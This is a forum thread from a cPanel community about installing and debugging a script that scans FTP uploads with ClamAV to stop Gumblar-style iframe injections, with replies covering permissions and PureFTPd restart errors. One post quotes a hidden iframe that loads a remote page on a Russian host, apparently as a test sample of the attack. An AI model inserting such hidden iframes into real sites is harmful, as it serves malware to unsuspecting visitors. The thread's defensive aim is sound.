The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

Discussion in 'Security' started by hidonet, Aug 7, 2009.

  1. Vinayak

    Vinayak Well-Known Member

    Joined:
    Jun 27, 2003
    Messages:
    269
    Likes Received:
    2
    Trophy Points:
    168
    Location:
    Bharat
    cPanel Access Level:
    Root Administrator
    But as of now where is the file ftp_clamscan.sh, from where can we download this file?
     
  2. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
  3. Vinayak

    Vinayak Well-Known Member

    Joined:
    Jun 27, 2003
    Messages:
    269
    Likes Received:
    2
    Trophy Points:
    168
    Location:
    Bharat
    cPanel Access Level:
    Root Administrator
  4. smksa

    smksa Member

    Joined:
    Aug 1, 2006
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    151
    Hi,

    I notice that the script will scan the overwrited file and move it to quarantine.

    Eg : public_html/index.php and if the attack is overwrite the index.php , the existing index.php will be remove and moved to quarantine folder.

    Is there anyway, that we can avoid the overwrite and avoid removal of existing index.php file ?

    Probably scanning during the upload before the overwrite happened ? :confused:
     
  5. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    I want to scan before overwrite but this is not possible at this time.
    I've contacted to author of PureFTPd and asked him. He did not replied me yet.
     
  6. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
  7. isputra

    isputra Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    576
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Mbelitar
    It's not working. After install this script like the manual and restart FTP then i try to upload file with this code in it :

    PHP:
    <iframe src="http://39q.ru:8080/index.php" width=124 height=163 style="visibility: hidden"></iframe>
    The file i called if-rame.html still can through the FTP process and reside on server without rejection from this script.

    So.. how to get this script working ?
     
  8. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    I'm going to update my script.

    these changes will be applied to script very soon:

    1 ) sh files need not be
    2 ) user name will be extracted from the file path. This was a bug. Pure FTP not returning username and other arguments.
    3 ) i will try to extract clean copy of infected file from backup.
     
  9. smksa

    smksa Member

    Joined:
    Aug 1, 2006
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    151
    Have pureftpd author responded to your question regarding scanning while uploading ?

    I think this will be better solution.
     
  10. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    no response from author :(
     
  11. webicom

    webicom Well-Known Member

    Joined:
    Mar 30, 2004
    Messages:
    54
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Slovenia
    Hello,

    I have also installed your script step by step from your site but it is not working. I have restart pure ftp and clam and still not working. The only thing I do not quite get and mybe here is the mistake so script dont work is this part at step 2 "Patch /etc/init.d/pure-ftpd" should I do something coze in step 2 I have only Edit /etc/init.d/pure-ftpd as you instruct but do not know what (if anything) should I do here "Edit /etc/init.d/pure-ftpd ".

    I would really appreciate your help since your script by description looks fantastic and would be really god defense agains iframe and some other hacks too.

    Best regards, Erik
     
  12. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    Possible problems,

    1 ) restart pure ftp with /etc/init.d/pure-ftpd restart, script not working with WHM restart

    2 ) you can use nano or vi for editing files. e.g. : nano /etc/init.d/pure-ftpd

    a new update will coming soon...
     
  13. webicom

    webicom Well-Known Member

    Joined:
    Mar 30, 2004
    Messages:
    54
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Slovenia
    Thanx but I did all that and it is not working. If I use command pa aux | grep clam I do see that /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh is runing but it does not scan uploaded files. If I kill that proccess and restart pure-ftp proccess starts again but just wunt to scan files.
     
  14. ThE EnD

    ThE EnD Member

    Joined:
    Aug 25, 2009
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    51
    i can not get it working

    hello ,
    first let me thank u soo much for that great work
    and hard one

    but iam sorry telling u i can't make it work on my server

    i follow all the steps
    Anti-Gumblar Protection Documentation
    all of it

    but what i do after that
    should i make any thing
    open and files or any thing to make the script start

    or what

    and another thing
    when i type

    /etc/init.d/pure-ftpd restart


    i get that result

    can u solve that please and thank you

    and should i replace that
    GLOBALS["whmhash"] ="511e....2c"; // whm remote access key for root user

    with the correct key i get from whm

    in ThE EnD iam sorry for my english
    waiting ur answer
     
  15. Vinayak

    Vinayak Well-Known Member

    Joined:
    Jun 27, 2003
    Messages:
    269
    Likes Received:
    2
    Trophy Points:
    168
    Location:
    Bharat
    cPanel Access Level:
    Root Administrator
    @ ThE EnD
    @ webicom

    Have you guys made the script executable, check file permissions.

    Also note that there are two files one ftp_clamscan.sh that passes variables to ftp_clamscan.php, so both should have correct permissions.

    @ webicom
    Yes you should
     
  16. ThE EnD

    ThE EnD Member

    Joined:
    Aug 25, 2009
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    51
    i have gave the two files the chmod 755 , is that ok
    and then replace the access key with the right now from the whm for the root

    and thin try to make

    so what's the error here ?and how to solve that problem

    and how to start the script working

    please explain
     
  17. Vinayak

    Vinayak Well-Known Member

    Joined:
    Jun 27, 2003
    Messages:
    269
    Likes Received:
    2
    Trophy Points:
    168
    Location:
    Bharat
    cPanel Access Level:
    Root Administrator
    Use

    chmod +x ftp_clamscan.sh
    chmod +x ftp_clamscan.php

    At command line, also see if an error_log file is generated in the same folder. If error_log is there check it out, see what message is in there.
     
  18. webicom

    webicom Well-Known Member

    Joined:
    Mar 30, 2004
    Messages:
    54
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Slovenia
    Thank you vinsar, I forgot to chmod php file and now that I did it is working. But still have strange problem on one server scripts allways find iframe script and block the attacker but does not change password for infected user. On the other server script does not allways find iframe script but do block IP and change pasword. The first server is cetnOS 4.7 other one is 5.2 both are same WHM/Cpanel version. Usualy on server where script does not always find iframe script after it finds infected file I have to kill pid of the ftp_clamscan.sh script and restart pure-ftpd and then it finds script again but after firs find it does not find anymore. Any idea why is that?
     
    #38 webicom, Aug 25, 2009
    Last edited: Aug 25, 2009
  19. ThE EnD

    ThE EnD Member

    Joined:
    Aug 25, 2009
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    51
    i have make the changes as u reques for the two files

    and these files in the root directory

    or when should i replace it
    and also

    iam still finiding the same error when restating ftp

    /etc/init.d/pure-ftpd restart
    Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
    kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

    Stopping pure-authd:
    Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog -- daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y 1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
    [ OK ]
    Starting pure-authd:


    please tell me what 's that
    as it's from the two line u ask to add in the ftp conf. files
    in ur explain

    and u do not answer me

    after all that how to know if the script is running or not

    and thanks
     
  20. webicom

    webicom Well-Known Member

    Joined:
    Mar 30, 2004
    Messages:
    54
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Slovenia
    run command through ssh ps aux | grep clam and reply here what you get. The best way to test if script is working is that you upload index.html or whatever file with iframe in it and if you have set everything right you should be disconected from server and get email. If you are gona test this way make shore you stil have another locatin with diferent IP from where you can connect again.
     
Loading...

Share This Page